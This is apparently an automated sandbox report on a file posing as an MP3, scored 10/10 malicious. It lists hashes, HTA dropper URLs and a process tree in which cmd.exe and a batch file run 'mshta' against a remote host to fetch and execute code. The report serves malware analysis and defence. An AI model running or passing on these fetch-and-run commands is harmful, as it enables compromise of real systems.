Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    923s
  • max time network
    879s
  • platform
    windows10-1703_x64
  • resource
    win10-20240404-en
  • resource tags

    arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
  • submitted
    19/08/2024, 05:54

General

  • Target

    She Say She Love Me.mp3

  • Size

    4.2MB

  • MD5

    37ab6a75bf6f5e9fe44fd7b304d6ebea

  • SHA1

    9e54b60d5926264866b726a1481423b1429a1b85

  • SHA256

    d2ab58a8be0005c2d8ee7290631c71b860e52b66efd5a27596374f12821e98cc

  • SHA512

    b04067b2fe5de3e9e48fdc9bcad067d8260e6c45e2b53b3630c2d663fc460ba7e82b1d900aa2b6fb28e5472685031a01d173c01e51c01158dad15a83d5af44b6

  • SSDEEP

    98304:vXRuJZshZJqw8Td0AvxxonMun4Dyai2qbN:vhuAh2bTbcnZn4DKN

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://192.168.1.132:9999/giHmh

Extracted

Language
hta
Source
URLs
hta.dropper

http://192.168.1.132:9999/r

Signatures

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 34 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Windows Media Player\wmplayer.exe
    "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\She Say She Love Me.mp3"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2612
    • C:\Program Files (x86)\Windows Media Player\setup_wm.exe
      "C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /prefetch:6 /Open "C:\Users\Admin\AppData\Local\Temp\She Say She Love Me.mp3"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1444
    • C:\Windows\SysWOW64\unregmp2.exe
      "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1440
      • C:\Windows\System32\unregmp2.exe
        "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
        3⤵
        • Enumerates connected drives
        • Suspicious use of AdjustPrivilegeToken
        PID:4560
  • C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4624
    • C:\Windows\system32\mshta.exe
      mshta http://192.168.1.132:9999/giHmh
      2⤵
        PID:3596
    • C:\Windows\system32\werfault.exe
      werfault.exe /h /shared Global\d9ea50dde03b4f81ae90ce8d217c66f9 /t 920 /p 3596
      1⤵
        PID:1516
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:4180
        • C:\Windows\system32\mshta.exe
          mshta http://192.168.1.132:9999/r
          2⤵
            PID:992
        • C:\Windows\system32\NOTEPAD.EXE
          "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\@.txt
          1⤵
          • Modifies registry class
          PID:1624
        • C:\Windows\system32\werfault.exe
          werfault.exe /h /shared Global\3fed34428b684a62b4e6514758cb2de1 /t 4148 /p 992
          1⤵
            PID:3800
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\@.bat" "
            1⤵
            • Suspicious use of WriteProcessMemory
            PID:4132
            • C:\Windows\system32\mshta.exe
              mshta http://192.168.1.132:9999/r
              2⤵
                PID:4576
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Desktop\@.bat"
              1⤵
              • Suspicious use of WriteProcessMemory
              PID:648
              • C:\Windows\system32\mshta.exe
                mshta http://192.168.1.132:9999/r
                2⤵
                  PID:2052
              • C:\Windows\system32\werfault.exe
                werfault.exe /h /shared Global\7f887209d7ec4ce288b3b55013de398e /t 2040 /p 4576
                1⤵
                  PID:4960

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

                  Filesize

                  256KB

                  MD5

                  f19cbc0fe6f95513f453d8c1d0bc0a43

                  SHA1

                  fe40eec93c9f2bbae036667757c786583a028592

                  SHA256

                  4360d972da47246e9f52a016a2f2c1a43e101cb10f7203f9ab489de34c50011f

                  SHA512

                  6ff6fe4cc24f6bf89c4ba432abe506c0c3ea54eda519ce5f8ba94ecf01148e5f6c05924a5fee483af043e7acde745b20f851f991f5d1fd291c715e7ccdf88541

                • C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML

                  Filesize

                  9KB

                  MD5

                  7050d5ae8acfbe560fa11073fef8185d

                  SHA1

                  5bc38e77ff06785fe0aec5a345c4ccd15752560e

                  SHA256

                  cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b

                  SHA512

                  a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

                • C:\Users\Admin\AppData\Local\Temp\wmsetup.log

                  Filesize

                  1KB

                  MD5

                  15b61357e242978ff51292c5adaf0a3d

                  SHA1

                  c2e8d97cbf95ecfd594d6dc1f54058e14eb1690e

                  SHA256

                  07e21f128786253bbc8c88851ef5fec93213ac0a207184095efb62a7dcdaafab

                  SHA512

                  3c667da7a477f2f1d2086375435b21be724cac02ec82c48a68eed21cb8289ab1753dddf3c9b2e3b7f6d3acd3df839f1f71028659c8b98ab41de2962a7ee91117